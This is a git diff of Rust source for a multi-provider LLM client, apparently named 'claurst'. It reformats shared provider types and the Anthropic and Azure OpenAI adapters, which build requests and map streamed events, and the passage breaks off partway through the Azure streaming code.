b/src-rust/crates/api/src/provider_types.rs index 87c16ce..b98e652 100644 --- a/src-rust/crates/api/src/provider_types.rs +++ b/src-rust/crates/api/src/provider_types.rs @@ -10,17 +10,18 @@ use serde_json::Value; // Re-export ThinkingConfig and SystemPrompt from the api types module so // callers only need to import from this module. -pub use crate::types::{ThinkingConfig, SystemPrompt}; +pub use crate::types::{SystemPrompt, ThinkingConfig}; // --------------------------------------------------------------------------- // StopReason // --------------------------------------------------------------------------- /// The reason a model stopped generating tokens. -#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)] +#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)] #[serde(rename_all = "snake_case")] pub enum StopReason { /// The model reached a natural stopping point. + #[default] EndTurn, /// The model generated a stop sequence. StopSequence, @@ -34,12 +35,6 @@ pub enum StopReason { Other(String), } -impl Default for StopReason { - fn default() -> Self { - StopReason::EndTurn - } -} - // --------------------------------------------------------------------------- // ProviderRequest // --------------------------------------------------------------------------- @@ -140,33 +135,19 @@ pub enum StreamEvent { }, /// Incremental text delta for an in-progress block. - TextDelta { - index: usize, - text: String, - }, + TextDelta { index: usize, text: String }, /// Incremental thinking / reasoning delta. - ThinkingDelta { - index: usize, - thinking: String, - }, + ThinkingDelta { index: usize, thinking: String }, /// Incremental delta for tool-call JSON arguments. - InputJsonDelta { - index: usize, - partial_json: String, - }, + InputJsonDelta { index: usize, partial_json: String }, /// Incremental delta for a cryptographic signature block. - SignatureDelta { - index: usize, - signature: String, - }, + SignatureDelta { index: usize, signature: String }, /// An in-progress content block is now complete. - ContentBlockStop { - index: usize, - }, + ContentBlockStop { index: usize }, /// Final message-level delta carrying the stop reason and updated usage. MessageDelta { @@ -178,16 +159,10 @@ pub enum StreamEvent { MessageStop, /// A provider-level error occurred mid-stream. - Error { - error_type: String, - message: String, - }, + Error { error_type: String, message: String }, /// Incremental reasoning / scratchpad delta (alias used by some providers). - ReasoningDelta { - index: usize, - reasoning: String, - }, + ReasoningDelta { index: usize, reasoning: String }, } // --------------------------------------------------------------------------- @@ -265,15 +240,10 @@ pub enum ProviderStatus { #[serde(rename_all = "snake_case", tag = "type")] pub enum AuthMethod { /// A static API key sent as an HTTP header. - ApiKey { - key: String, - header: ApiKeyHeader, - }, + ApiKey { key: String, header: ApiKeyHeader }, /// A bearer token sent in the `Authorization` header. - Bearer { - token: String, - }, + Bearer { token: String }, /// AWS Signature V4 credentials for Amazon Bedrock. AwsCredentials { diff --git a/src-rust/crates/api/src/providers/anthropic.rs b/src-rust/crates/api/src/providers/anthropic.rs index dc3bd36..75f17a1 100644 --- a/src-rust/crates/api/src/providers/anthropic.rs +++ b/src-rust/crates/api/src/providers/anthropic.rs @@ -1,370 +1,380 @@ -// providers/anthropic.rs — AnthropicProvider: wraps AnthropicClient in the -// unified LlmProvider trait. -// -// Phase 2A: create_message and create_message_stream are fully implemented by -// mapping ProviderRequest → CreateMessageRequest and mapping -// AnthropicStreamEvent → provider_types::StreamEvent. - -use std::pin::Pin; -use std::sync::Arc; - -use async_stream::stream; -use async_trait::async_trait; -use claurst_core::provider_id::{ModelId, ProviderId}; -use claurst_core::types::{ContentBlock, UsageInfo}; -use futures::Stream; - -use crate::client::{AnthropicClient, ClientConfig}; -use crate::provider::{LlmProvider, ModelInfo}; -use crate::provider_error::ProviderError; -use crate::provider_types::{ - ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason, - StreamEvent, SystemPromptStyle, -}; -use crate::streaming::{AnthropicStreamEvent, ContentDelta, NullStreamHandler}; -use crate::types::{ApiMessage, ApiToolDefinition, CreateMessageRequest}; - -use super::message_normalization::normalize_anthropic_messages; - -// --------------------------------------------------------------------------- -// AnthropicProvider -// --------------------------------------------------------------------------- - -/// Wraps [`AnthropicClient`] so it can be held in a [`ProviderRegistry`] behind -/// `Arc`. -pub struct AnthropicProvider { - client: Arc, - id: ProviderId, -} - -impl AnthropicProvider { - /// Wrap an already-constructed (and Arc-wrapped) [`AnthropicClient`]. - pub fn new(client: Arc) -> Self { - Self { - client, - id: ProviderId::new(ProviderId::ANTHROPIC), - } - } - - /// Construct directly from a [`ClientConfig`], creating the inner client. - pub fn from_config(config: ClientConfig) -> Self { - let client = AnthropicClient::new(config) - .expect("AnthropicProvider::from_config: failed to create AnthropicClient"); - Self { - client: Arc::new(client), - id: ProviderId::new(ProviderId::ANTHROPIC), - } - } - - /// Build a [`CreateMessageRequest`] from a [`ProviderRequest`]. - fn build_request(request: &ProviderRequest) -> CreateMessageRequest { - let normalized_messages = normalize_anthropic_messages(&request.messages); - let api_messages: Vec = normalized_messages - .iter() - .map(ApiMessage::from) - .collect(); - - let api_tools: Option> = if request.tools.is_empty() { - None - } else { - Some(request.tools.iter().map(ApiToolDefinition::from).collect()) - }; - - let system = request.system_prompt.clone(); - - let mut builder = CreateMessageRequest::builder(&request.model, request.max_tokens) - .messages(api_messages); - - if let Some(sys) = system { - builder = builder.system(sys); - } - if let Some(tools) = api_tools { - builder = builder.tools(tools); - } - if let Some(t) = request.temperature { - builder = builder.temperature(t as f32); - } - if let Some(p) = request.top_p { - builder = builder.top_p(p as f32); - } - if let Some(k) = request.top_k { - builder = builder.top_k(k); - } - if !request.stop_sequences.is_empty() { - builder = builder.stop_sequences(request.stop_sequences.clone()); - } - if let Some(tc) = request.thinking.clone() { - builder = builder.thinking(tc); - } - - builder.build() - } - - /// Map a string stop_reason from Anthropic wire format to [`StopReason`]. - fn map_stop_reason(s: &str) -> StopReason { - match s { - "end_turn" => StopReason::EndTurn, - "stop_sequence" => StopReason::StopSequence, - "max_tokens" => StopReason::MaxTokens, - "tool_use" => StopReason::ToolUse, - other => StopReason::Other(other.to_string()), - } - } - - /// Map an [`AnthropicStreamEvent`] to the provider-agnostic [`StreamEvent`]. - fn map_stream_event(evt: AnthropicStreamEvent) -> Option { - match evt { - AnthropicStreamEvent::MessageStart { id, model, usage } => { - Some(StreamEvent::MessageStart { id, model, usage }) - } - AnthropicStreamEvent::ContentBlockStart { index, content_block } => { - Some(StreamEvent::ContentBlockStart { index, content_block }) - } - AnthropicStreamEvent::ContentBlockDelta { index, delta } => match delta { - ContentDelta::TextDelta { text } => { - Some(StreamEvent::TextDelta { index, text }) - } - ContentDelta::ThinkingDelta { thinking } => { - Some(StreamEvent::ThinkingDelta { index, thinking }) - } - ContentDelta::SignatureDelta { signature } => { - Some(StreamEvent::SignatureDelta { index, signature }) - } - ContentDelta::InputJsonDelta { partial_json } => { - Some(StreamEvent::InputJsonDelta { index, partial_json }) - } - }, - AnthropicStreamEvent::ContentBlockStop { index } => { - Some(StreamEvent::ContentBlockStop { index }) - } - AnthropicStreamEvent::MessageDelta { stop_reason, usage } => { - let mapped_stop = stop_reason.as_deref().map(Self::map_stop_reason); - Some(StreamEvent::MessageDelta { - stop_reason: mapped_stop, - usage, - }) - } - AnthropicStreamEvent::MessageStop => Some(StreamEvent::MessageStop), - AnthropicStreamEvent::Error { error_type, message } => { - Some(StreamEvent::Error { error_type, message }) - } - AnthropicStreamEvent::Ping => None, - } - } -} - -// --------------------------------------------------------------------------- -// LlmProvider impl -// --------------------------------------------------------------------------- - -#[async_trait] -impl LlmProvider for AnthropicProvider { - fn id(&self) -> &ProviderId { - &self.id - } - - fn name(&self) -> &str { - "Anthropic" - } - - async fn create_message( - &self, - request: ProviderRequest, - ) -> Result { - // Collect stream events to build a complete response. - let mut stream = self.create_message_stream(request).await?; - - let mut id = String::from("unknown"); - let mut model = String::new(); - let mut text_parts: Vec<(usize, String)> = Vec::new(); - let mut content_blocks: Vec = Vec::new(); - let mut stop_reason = StopReason::EndTurn; - let mut usage = UsageInfo::default(); - - // We need to track tool use blocks being assembled from partial JSON. - // Use a simple per-index buffer. - let mut tool_buffers: std::collections::HashMap = - std::collections::HashMap::new(); // index -> (id, name, json_buf) - - use futures::StreamExt; - while let Some(result) = stream.next().await { - match result { - Err(e) => return Err(e), - Ok(evt) => match evt { - StreamEvent::MessageStart { - id: msg_id, - model: msg_model, - usage: msg_usage, - } => { - id = msg_id; - model = msg_model; - usage = msg_usage; - } - StreamEvent::ContentBlockStart { - index, - content_block, - } => match content_block { - ContentBlock::Text { text } => { - text_parts.push((index, text)); - } - ContentBlock::ToolUse { - id: tool_id, - name, - input: _, - } => { - tool_buffers.insert(index, (tool_id, name, String::new())); - } - other => { - content_blocks.push(other); - } - }, - StreamEvent::TextDelta { index, text } => { - if let Some(entry) = text_parts.iter_mut().find(|(i, _)| *i == index) { - entry.1.push_str(&text); - } - } - StreamEvent::InputJsonDelta { - index, - partial_json, - } => { - if let Some((_, _, buf)) = tool_buffers.get_mut(&index) { - buf.push_str(&partial_json); - } - } - StreamEvent::ContentBlockStop { index } => { - // Finalize any tool use block at this index. - if let Some((tool_id, name, json_buf)) = tool_buffers.remove(&index) { - let input = serde_json::from_str(&json_buf) - .unwrap_or(serde_json::Value::Object(Default::default())); - content_blocks.push(ContentBlock::ToolUse { - id: tool_id, - name, - input, - }); - } - } - StreamEvent::MessageDelta { - stop_reason: sr, - usage: delta_usage, - } => { - if let Some(r) = sr { - stop_reason = r; - } - if let Some(u) = delta_usage { - usage.output_tokens += u.output_tokens; - } - } - StreamEvent::MessageStop => break, - StreamEvent::Error { error_type, message } => { - return Err(ProviderError::StreamError { - provider: self.id.clone(), - message: format!("[{}] {}", error_type, message), - partial_response: None, - }); - } - _ => {} - }, - } - } - - // Assemble text blocks into content, sorted by index. - text_parts.sort_by_key(|(i, _)| *i); - let mut all_blocks: Vec<(usize, ContentBlock)> = text_parts - .into_iter() - .map(|(i, text)| (i, ContentBlock::Text { text })) - .collect(); - // We don't have indices for the non-text blocks — just append them. - // In practice content blocks are already in-order from the stream. - for block in content_blocks { - all_blocks.push((usize::MAX, block)); - } - let final_content: Vec = all_blocks.into_iter().map(|(_, b)| b).collect(); - - Ok(ProviderResponse { - id, - content: final_content, - stop_reason, - usage, - model, - }) - } - - async fn create_message_stream( - &self, - request: ProviderRequest, - ) -> Result> + Send>>, ProviderError> - { - let api_request = Self::build_request(&request); - let handler = Arc::new(NullStreamHandler); - - let provider_id = self.id.clone(); - - let mut rx = self - .client - .create_message_stream(api_request, handler) - .await - .map_err(|e| ProviderError::Other { - provider: provider_id.clone(), - message: e.to_string(), - status: None, - body: None, - })?; - - let s = stream! { - while let Some(anthropic_evt) = rx.recv().await { - if let Some(unified_evt) = AnthropicProvider::map_stream_event(anthropic_evt) { - yield Ok(unified_evt); - } - } - }; - - Ok(Box::pin(s)) - } - - async fn list_models(&self) -> Result, ProviderError> { - let anthropic_id = ProviderId::new(ProviderId::ANTHROPIC); - Ok(vec![ - ModelInfo { - id: ModelId::new("claude-opus-4-6"), - provider_id: anthropic_id.clone(), - name: "Claude Opus 4.6".to_string(), - context_window: 200_000, - max_output_tokens: 32_000, - }, - ModelInfo { - id: ModelId::new("claude-sonnet-4-6"), - provider_id: anthropic_id.clone(), - name: "Claude Sonnet 4.6".to_string(), - context_window: 200_000, - max_output_tokens: 16_000, - }, - ModelInfo { - id: ModelId::new("claude-haiku-4-5-20251001"), - provider_id: anthropic_id.clone(), - name: "Claude Haiku 4.5".to_string(), - context_window: 200_000, - max_output_tokens: 8_096, - }, - ]) - } - - async fn health_check(&self) -> Result { - // Client was successfully constructed with a non-empty API key. - Ok(ProviderStatus::Healthy) - } - - fn capabilities(&self) -> ProviderCapabilities { - ProviderCapabilities { - streaming: true, - tool_calling: true, - thinking: true, - image_input: true, - pdf_input: true, - audio_input: false, - video_input: false, - caching: true, - structured_output: true, - system_prompt_style: SystemPromptStyle::TopLevel, - } - } -} +// providers/anthropic.rs — AnthropicProvider: wraps AnthropicClient in the +// unified LlmProvider trait. +// +// Phase 2A: create_message and create_message_stream are fully implemented by +// mapping ProviderRequest → CreateMessageRequest and mapping +// AnthropicStreamEvent → provider_types::StreamEvent. + +use std::pin::Pin; +use std::sync::Arc; + +use async_stream::stream; +use async_trait::async_trait; +use claurst_core::provider_id::{ModelId, ProviderId}; +use claurst_core::types::{ContentBlock, UsageInfo}; +use futures::Stream; + +use crate::client::{AnthropicClient, ClientConfig}; +use crate::provider::{LlmProvider, ModelInfo}; +use crate::provider_error::ProviderError; +use crate::provider_types::{ + ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StopReason, + StreamEvent, SystemPromptStyle, +}; +use crate::streaming::{AnthropicStreamEvent, ContentDelta, NullStreamHandler}; +use crate::types::{ApiMessage, ApiToolDefinition, CreateMessageRequest}; + +use super::message_normalization::normalize_anthropic_messages; + +// --------------------------------------------------------------------------- +// AnthropicProvider +// --------------------------------------------------------------------------- + +/// Wraps [`AnthropicClient`] so it can be held in a [`ProviderRegistry`] behind +/// `Arc`. +pub struct AnthropicProvider { + client: Arc, + id: ProviderId, +} + +impl AnthropicProvider { + /// Wrap an already-constructed (and Arc-wrapped) [`AnthropicClient`]. + pub fn new(client: Arc) -> Self { + Self { + client, + id: ProviderId::new(ProviderId::ANTHROPIC), + } + } + + /// Construct directly from a [`ClientConfig`], creating the inner client. + pub fn from_config(config: ClientConfig) -> Self { + let client = AnthropicClient::new(config) + .expect("AnthropicProvider::from_config: failed to create AnthropicClient"); + Self { + client: Arc::new(client), + id: ProviderId::new(ProviderId::ANTHROPIC), + } + } + + /// Build a [`CreateMessageRequest`] from a [`ProviderRequest`]. + fn build_request(request: &ProviderRequest) -> CreateMessageRequest { + let normalized_messages = normalize_anthropic_messages(&request.messages); + let api_messages: Vec = + normalized_messages.iter().map(ApiMessage::from).collect(); + + let api_tools: Option> = if request.tools.is_empty() { + None + } else { + Some(request.tools.iter().map(ApiToolDefinition::from).collect()) + }; + + let system = request.system_prompt.clone(); + + let mut builder = CreateMessageRequest::builder(&request.model, request.max_tokens) + .messages(api_messages); + + if let Some(sys) = system { + builder = builder.system(sys); + } + if let Some(tools) = api_tools { + builder = builder.tools(tools); + } + if let Some(t) = request.temperature { + builder = builder.temperature(t as f32); + } + if let Some(p) = request.top_p { + builder = builder.top_p(p as f32); + } + if let Some(k) = request.top_k { + builder = builder.top_k(k); + } + if !request.stop_sequences.is_empty() { + builder = builder.stop_sequences(request.stop_sequences.clone()); + } + if let Some(tc) = request.thinking.clone() { + builder = builder.thinking(tc); + } + + builder.build() + } + + /// Map a string stop_reason from Anthropic wire format to [`StopReason`]. + fn map_stop_reason(s: &str) -> StopReason { + match s { + "end_turn" => StopReason::EndTurn, + "stop_sequence" => StopReason::StopSequence, + "max_tokens" => StopReason::MaxTokens, + "tool_use" => StopReason::ToolUse, + other => StopReason::Other(other.to_string()), + } + } + + /// Map an [`AnthropicStreamEvent`] to the provider-agnostic [`StreamEvent`]. + fn map_stream_event(evt: AnthropicStreamEvent) -> Option { + match evt { + AnthropicStreamEvent::MessageStart { id, model, usage } => { + Some(StreamEvent::MessageStart { id, model, usage }) + } + AnthropicStreamEvent::ContentBlockStart { + index, + content_block, + } => Some(StreamEvent::ContentBlockStart { + index, + content_block, + }), + AnthropicStreamEvent::ContentBlockDelta { index, delta } => match delta { + ContentDelta::TextDelta { text } => Some(StreamEvent::TextDelta { index, text }), + ContentDelta::ThinkingDelta { thinking } => { + Some(StreamEvent::ThinkingDelta { index, thinking }) + } + ContentDelta::SignatureDelta { signature } => { + Some(StreamEvent::SignatureDelta { index, signature }) + } + ContentDelta::InputJsonDelta { partial_json } => { + Some(StreamEvent::InputJsonDelta { + index, + partial_json, + }) + } + }, + AnthropicStreamEvent::ContentBlockStop { index } => { + Some(StreamEvent::ContentBlockStop { index }) + } + AnthropicStreamEvent::MessageDelta { stop_reason, usage } => { + let mapped_stop = stop_reason.as_deref().map(Self::map_stop_reason); + Some(StreamEvent::MessageDelta { + stop_reason: mapped_stop, + usage, + }) + } + AnthropicStreamEvent::MessageStop => Some(StreamEvent::MessageStop), + AnthropicStreamEvent::Error { + error_type, + message, + } => Some(StreamEvent::Error { + error_type, + message, + }), + AnthropicStreamEvent::Ping => None, + } + } +} + +// --------------------------------------------------------------------------- +// LlmProvider impl +// --------------------------------------------------------------------------- + +#[async_trait] +impl LlmProvider for AnthropicProvider { + fn id(&self) -> &ProviderId { + &self.id + } + + fn name(&self) -> &str { + "Anthropic" + } + + async fn create_message( + &self, + request: ProviderRequest, + ) -> Result { + // Collect stream events to build a complete response. + let mut stream = self.create_message_stream(request).await?; + + let mut id = String::from("unknown"); + let mut model = String::new(); + let mut text_parts: Vec<(usize, String)> = Vec::new(); + let mut content_blocks: Vec = Vec::new(); + let mut stop_reason = StopReason::EndTurn; + let mut usage = UsageInfo::default(); + + // We need to track tool use blocks being assembled from partial JSON. + // Use a simple per-index buffer. + let mut tool_buffers: std::collections::HashMap = + std::collections::HashMap::new(); // index -> (id, name, json_buf) + + use futures::StreamExt; + while let Some(result) = stream.next().await { + match result { + Err(e) => return Err(e), + Ok(evt) => match evt { + StreamEvent::MessageStart { + id: msg_id, + model: msg_model, + usage: msg_usage, + } => { + id = msg_id; + model = msg_model; + usage = msg_usage; + } + StreamEvent::ContentBlockStart { + index, + content_block, + } => match content_block { + ContentBlock::Text { text } => { + text_parts.push((index, text)); + } + ContentBlock::ToolUse { + id: tool_id, + name, + input: _, + } => { + tool_buffers.insert(index, (tool_id, name, String::new())); + } + other => { + content_blocks.push(other); + } + }, + StreamEvent::TextDelta { index, text } => { + if let Some(entry) = text_parts.iter_mut().find(|(i, _)| *i == index) { + entry.1.push_str(&text); + } + } + StreamEvent::InputJsonDelta { + index, + partial_json, + } => { + if let Some((_, _, buf)) = tool_buffers.get_mut(&index) { + buf.push_str(&partial_json); + } + } + StreamEvent::ContentBlockStop { index } => { + // Finalize any tool use block at this index. + if let Some((tool_id, name, json_buf)) = tool_buffers.remove(&index) { + let input = serde_json::from_str(&json_buf) + .unwrap_or(serde_json::Value::Object(Default::default())); + content_blocks.push(ContentBlock::ToolUse { + id: tool_id, + name, + input, + }); + } + } + StreamEvent::MessageDelta { + stop_reason: sr, + usage: delta_usage, + } => { + if let Some(r) = sr { + stop_reason = r; + } + if let Some(u) = delta_usage { + usage.output_tokens += u.output_tokens; + } + } + StreamEvent::MessageStop => break, + StreamEvent::Error { + error_type, + message, + } => { + return Err(ProviderError::StreamError { + provider: self.id.clone(), + message: format!("[{}] {}", error_type, message), + partial_response: None, + }); + } + _ => {} + }, + } + } + + // Assemble text blocks into content, sorted by index. + text_parts.sort_by_key(|(i, _)| *i); + let mut all_blocks: Vec<(usize, ContentBlock)> = text_parts + .into_iter() + .map(|(i, text)| (i, ContentBlock::Text { text })) + .collect(); + // We don't have indices for the non-text blocks — just append them. + // In practice content blocks are already in-order from the stream. + for block in content_blocks { + all_blocks.push((usize::MAX, block)); + } + let final_content: Vec = all_blocks.into_iter().map(|(_, b)| b).collect(); + + Ok(ProviderResponse { + id, + content: final_content, + stop_reason, + usage, + model, + }) + } + + async fn create_message_stream( + &self, + request: ProviderRequest, + ) -> Result> + Send>>, ProviderError> + { + let api_request = Self::build_request(&request); + let handler = Arc::new(NullStreamHandler); + + let provider_id = self.id.clone(); + + let mut rx = self + .client + .create_message_stream(api_request, handler) + .await + .map_err(|e| ProviderError::Other { + provider: provider_id.clone(), + message: e.to_string(), + status: None, + body: None, + })?; + + let s = stream! { + while let Some(anthropic_evt) = rx.recv().await { + if let Some(unified_evt) = AnthropicProvider::map_stream_event(anthropic_evt) { + yield Ok(unified_evt); + } + } + }; + + Ok(Box::pin(s)) + } + + async fn list_models(&self) -> Result, ProviderError> { + let anthropic_id = ProviderId::new(ProviderId::ANTHROPIC); + Ok(vec![ + ModelInfo { + id: ModelId::new("claude-opus-4-6"), + provider_id: anthropic_id.clone(), + name: "Claude Opus 4.6".to_string(), + context_window: 200_000, + max_output_tokens: 32_000, + }, + ModelInfo { + id: ModelId::new("claude-sonnet-4-6"), + provider_id: anthropic_id.clone(), + name: "Claude Sonnet 4.6".to_string(), + context_window: 200_000, + max_output_tokens: 16_000, + }, + ModelInfo { + id: ModelId::new("claude-haiku-4-5-20251001"), + provider_id: anthropic_id.clone(), + name: "Claude Haiku 4.5".to_string(), + context_window: 200_000, + max_output_tokens: 8_096, + }, + ]) + } + + async fn health_check(&self) -> Result { + // Client was successfully constructed with a non-empty API key. + Ok(ProviderStatus::Healthy) + } + + fn capabilities(&self) -> ProviderCapabilities { + ProviderCapabilities { + streaming: true, + tool_calling: true, + thinking: true, + image_input: true, + pdf_input: true, + audio_input: false, + video_input: false, + caching: true, + structured_output: true, + system_prompt_style: SystemPromptStyle::TopLevel, + } + } +} diff --git a/src-rust/crates/api/src/providers/azure.rs b/src-rust/crates/api/src/providers/azure.rs index a0b619d..d69302e 100644 --- a/src-rust/crates/api/src/providers/azure.rs +++ b/src-rust/crates/api/src/providers/azure.rs @@ -1,521 +1,521 @@ -// providers/azure.rs — Azure OpenAI provider adapter. -// -// Azure OpenAI uses the same Chat Completions wire format as OpenAI, but with -// a different URL structure and auth header. -// -// URL: https://{resource}.openai.azure.com/openai/deployments/{deployment}/chat/completions?api-version={version} -// Auth: api-key: (NOT Authorization: Bearer) -// Deployment == model name in Azure. - -use std::pin::Pin; - -use async_stream::stream; -use async_trait::async_trait; -use claurst_core::provider_id::{ModelId, ProviderId}; -use claurst_core::types::{ContentBlock, UsageInfo}; -use futures::Stream; -use serde_json::{json, Value}; -use tracing::debug; - -use crate::error_handling::parse_error_response; -use crate::provider::{LlmProvider, ModelInfo}; -use crate::provider_error::ProviderError; -use crate::provider_types::{ - ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, StreamEvent, - SystemPromptStyle, -}; -use crate::providers::openai::OpenAiProvider; - -use super::request_options::merge_openai_compatible_options; - -// --------------------------------------------------------------------------- -// AzureProvider -// --------------------------------------------------------------------------- - -pub struct AzureProvider { - id: ProviderId, - resource_name: String, - api_key: String, - api_version: String, - http_client: reqwest::Client, -} - -impl AzureProvider { - pub fn new(resource_name: String, api_key: String) -> Self { - let http_client = reqwest::Client::builder() - .timeout(std::time::Duration::from_secs(600)) - .build() - .expect("failed to build reqwest client"); - - Self { - id: ProviderId::new(ProviderId::AZURE), - resource_name, - api_key, - api_version: "2024-08-01-preview".to_string(), - http_client, - } - } - - pub fn with_api_version(mut self, version: String) -> Self { - self.api_version = version; - self - } - - pub fn from_env() -> Option { - let key = std::env::var("AZURE_API_KEY").ok()?; - let resource = std::env::var("AZURE_RESOURCE_NAME").ok()?; - let version = std::env::var("AZURE_API_VERSION") - .unwrap_or_else(|_| "2024-08-01-preview".to_string()); - Some(Self::new(resource, key).with_api_version(version)) - } - - fn endpoint_url(&self, deployment: &str) -> String { - format!( - "https://{}.openai.azure.com/openai/deployments/{}/chat/completions?api-version={}", - self.resource_name, deployment, self.api_version - ) - } - - fn map_http_error(&self, status: u16, body: &str) -> ProviderError { - parse_error_response(status, body, &self.id) - } - - async fn send_non_streaming( - &self, - request: &ProviderRequest, - ) -> Result { - let messages = OpenAiProvider::to_openai_messages_pub( - &request.messages, - request.system_prompt.as_ref(), - ); - let tools = OpenAiProvider::to_openai_tools_pub(&request.tools); - - let mut body = json!({ - "model": request.model, - "max_tokens": request.max_tokens, - "messages": messages, - "stream": false, - }); - - if !tools.is_empty() { - body["tools"] = json!(tools); - } - if let Some(t) = request.temperature { - body["temperature"] = json!(t); - } - if let Some(p) = request.top_p { - body["top_p"] = json!(p); - } - if !request.stop_sequences.is_empty() { - body["stop"] = json!(request.stop_sequences); - } - merge_openai_compatible_options(&mut body, &request.provider_options); - - let url = self.endpoint_url(&request.model); - - let resp = self - .http_client - .post(&url) - .header("api-key", &self.api_key) - .header("Content-Type", "application/json") - .json(&body) - .send() - .await - .map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("HTTP request failed: {}", e), - status: None, - body: None, - })?; - - let status = resp.status().as_u16(); - let text = resp.text().await.map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to read response body: {}", e), - status: Some(status), - body: None, - })?; - - if !(200..300).contains(&(status as usize)) { - return Err(self.map_http_error(status, &text)); - } - - let json_val: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to parse response JSON: {}", e), - status: Some(status), - body: Some(text.clone()), - })?; - - OpenAiProvider::parse_non_streaming_response_pub(&json_val, &self.id) - } - - async fn do_streaming( - &self, - request: &ProviderRequest, - ) -> Result { - let messages = OpenAiProvider::to_openai_messages_pub( - &request.messages, - request.system_prompt.as_ref(), - ); - let tools = OpenAiProvider::to_openai_tools_pub(&request.tools); - - let mut body = json!({ - "model": request.model, - "max_tokens": request.max_tokens, - "messages": messages, - "stream": true, - "stream_options": { "include_usage": true }, - }); - - if !tools.is_empty() { - body["tools"] = json!(tools); - } - if let Some(t) = request.temperature { - body["temperature"] = json!(t); - } - if let Some(p) = request.top_p { - body["top_p"] = json!(p); - } - if !request.stop_sequences.is_empty() { - body["stop"] = json!(request.stop_sequences); - } - merge_openai_compatible_options(&mut body, &request.provider_options); - - let url = self.endpoint_url(&request.model); - - let resp = self - .http_client - .post(&url) - .header("api-key", &self.api_key) - .header("Content-Type", "application/json") - .header("Accept", "text/event-stream") - .json(&body) - .send() - .await - .map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("HTTP request failed: {}", e), - status: None, - body: None, - })?; - - let status = resp.status().as_u16(); - if !(200..300).contains(&(status as usize)) { - let text = resp.text().await.unwrap_or_default(); - return Err(self.map_http_error(status, &text)); - } - - Ok(resp) - } -} - -// --------------------------------------------------------------------------- -// LlmProvider impl -// --------------------------------------------------------------------------- - -#[async_trait] -impl LlmProvider for AzureProvider { - fn id(&self) -> &ProviderId { - &self.id - } - - fn name(&self) -> &str { - "Azure OpenAI" - } - - async fn create_message( - &self, - request: ProviderRequest, - ) -> Result { - self.send_non_streaming(&request).await - } - - async fn create_message_stream( - &self, - request: ProviderRequest, - ) -> Result> + Send>>, ProviderError> - { - let resp = self.do_streaming(&request).await?; - let provider_id = self.id.clone(); - - let s = stream! { - use futures::StreamExt; - - let mut byte_stream = resp.bytes_stream(); - let mut leftover = String::new(); - - let mut message_started = false; - let mut message_id = String::from("unknown"); - let mut model_name = String::new(); - let mut tool_call_buffers: std::collections::HashMap< - usize, - (String, String, String), - > = std::collections::HashMap::new(); - - while let Some(chunk_result) = byte_stream.next().await { - let chunk = match chunk_result { - Ok(c) => c, - Err(e) => { - yield Err(ProviderError::StreamError { - provider: provider_id.clone(), - message: format!("Stream read error: {}", e), - partial_response: None, - }); - return; - } - }; - - let text = String::from_utf8_lossy(&chunk); - let combined = if leftover.is_empty() { - text.to_string() - } else { - let mut s = std::mem::take(&mut leftover); - s.push_str(&text); - s - }; - - let mut lines: Vec<&str> = combined.split('\n').collect(); - if !combined.ends_with('\n') { - leftover = lines.pop().unwrap_or("").to_string(); - } - - for line in lines { - let line = line.trim_end_matches('\r').trim(); - - if line.is_empty() || line.starts_with(':') { - continue; - } - - let data = if let Some(rest) = line.strip_prefix("data:") { - rest.trim() - } else { - continue; - }; - - if data == "[DONE]" { - yield Ok(StreamEvent::MessageStop); - return; - } - - let chunk_json: Value = match serde_json::from_str(data) { - Ok(v) => v, - Err(e) => { - debug!("Failed to parse Azure SSE chunk: {}: {}", e, data); - continue; - } - }; - - if !message_started { - if let Some(id) = chunk_json.get("id").and_then(|v| v.as_str()) { - message_id = id.to_string(); - } - if let Some(m) = chunk_json.get("model").and_then(|v| v.as_str()) { - model_name = m.to_string(); - } - yield Ok(StreamEvent::MessageStart { - id: message_id.clone(), - model: model_name.clone(), - usage: UsageInfo::default(), - }); - yield Ok(StreamEvent::ContentBlockStart { - index: 0, - content_block: ContentBlock::Text { text: String::new() }, - }); - message_started = true; - } - - let choices = match chunk_json.get("choices").and_then(|c| c.as_array()) { - Some(c) => c, - None => { - if let Some(usage_val) = chunk_json.get("usage") { - let usage = OpenAiProvider::parse_usage_pub(Some(usage_val)); - yield Ok(StreamEvent::MessageDelta { - stop_reason: None, - usage: Some(usage), - }); - } - continue; - } - }; - - let choice = match choices.first() { - Some(c) => c, - None => continue, - }; - - let delta = match choice.get("delta") { - Some(d) => d, - None => continue, - }; - - if let Some(content) = delta.get("content").and_then(|c| c.as_str()) { - if !content.is_empty() { - yield Ok(StreamEvent::TextDelta { - index: 0, - text: content.to_string(), - }); - } - } - - if let Some(tool_calls) = - delta.get("tool_calls").and_then(|t| t.as_array()) - { - for tc in tool_calls { - let tc_index = tc - .get("index") - .and_then(|v| v.as_u64()) - .unwrap_or(0) as usize; - if let Some(tc_id) = tc.get("id").and_then(|v| v.as_str()) { - let name = tc - .get("function") - .and_then(|f| f.get("name")) - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_string(); - let block_index = 1 + tc_index; - tool_call_buffers.insert( - block_index, - (tc_id.to_string(), name.clone(), String::new()), - ); - yield Ok(StreamEvent::ContentBlockStart { - index: block_index, - content_block: ContentBlock::ToolUse { - id: tc_id.to_string(), - name, - input: serde_json::json!({}), - }, - }); - } - if let Some(args_frag) = tc - .get("function") - .and_then(|f| f.get("arguments")) - .and_then(|v| v.as_str()) - { - if !args_frag.is_empty() { - let block_index = 1 + tc_index; - if let Some((_, _, buf)) = - tool_call_buffers.get_mut(&block_index) - { - buf.push_str(args_frag); - } - yield Ok(StreamEvent::InputJsonDelta { - index: block_index, - partial_json: args_frag.to_string(), - }); - } - } - } - } - - if let Some(finish_reason) = - choice.get("finish_reason").and_then(|v| v.as_str()) - { - if !finish_reason.is_empty() && finish_reason != "null" { - yield Ok(StreamEvent::ContentBlockStop { index: 0 }); - let mut tc_indices: Vec = - tool_call_buffers.keys().cloned().collect(); - tc_indices.sort(); - for idx in tc_indices { - yield Ok(StreamEvent::ContentBlockStop { index: idx }); - } - - let 